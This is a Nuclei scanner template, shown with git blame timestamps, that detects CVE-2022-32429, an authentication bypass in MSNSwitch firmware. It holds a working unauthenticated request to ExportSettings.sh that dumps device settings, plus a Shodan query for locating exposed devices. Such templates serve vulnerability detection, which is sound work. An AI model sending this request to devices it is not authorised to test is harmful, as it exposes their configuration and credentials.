nuclei-templates/http/cves/2022/CVE-2022-32429.yaml

51 lines
1.6 KiB
YAML
Raw Normal View History

2023-01-23 11:12:48 +00:00
id: CVE-2022-32429
info:
name: MSNSwitch Firmware MNT.2408 - Authentication Bypass
2023-01-23 11:12:48 +00:00
author: theabhinavgaur
severity: critical
description: |
MSNSwitch Firmware MNT.2408 is susceptible to authentication bypass in the component http://MYDEVICEIP/cgi-bin-sdb/ExportSettings.sh. An attacker can arbitrarily configure settings, leading to possible remote code execution and subsequent unauthorized operations.
2023-01-23 11:12:48 +00:00
reference:
2023-01-23 11:23:19 +00:00
- https://packetstormsecurity.com/files/169819/MSNSwitch-Firmware-MNT.2408-Remote-Code-Execution.html
- https://elifulkerson.com/CVE-2022-32429/
2023-01-23 11:12:48 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-32429
- http://packetstormsecurity.com/files/169819/MSNSwitch-Firmware-MNT.2408-Remote-Code-Execution.html
2023-01-23 11:12:48 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
2023-01-23 11:12:48 +00:00
cve-id: CVE-2022-32429
cwe-id: CWE-287
2023-07-11 19:49:27 +00:00
epss-score: 0.01391
cpe: cpe:2.3:o:megatech:msnswitch_firmware:mnt.2408:*:*:*:*:*:*:*
2023-01-23 11:12:48 +00:00
metadata:
max-request: 1
shodan-query: http.favicon.hash:-2073748627 || http.favicon.hash:-1721140132
2023-06-04 08:13:42 +00:00
verified: true
2023-07-11 19:49:27 +00:00
vendor: megatech
product: msnswitch_firmware
tags: config,dump,packetstorm,cve,cve2022,msmswitch,unauth,switch
2023-01-23 11:12:48 +00:00
http:
2023-01-23 11:32:22 +00:00
- method: GET
path:
- "{{BaseURL}}/cgi-bin-hax/ExportSettings.sh"
2023-01-23 11:37:00 +00:00
2023-01-23 11:12:48 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
- "SSID1"
2023-01-26 15:51:53 +00:00
- type: regex
part: header
regex:
- 'filename="Settings(.*).dat'
- 'application/octet-stream'
condition: and
2023-01-23 11:12:48 +00:00
- type: status
status:
- 200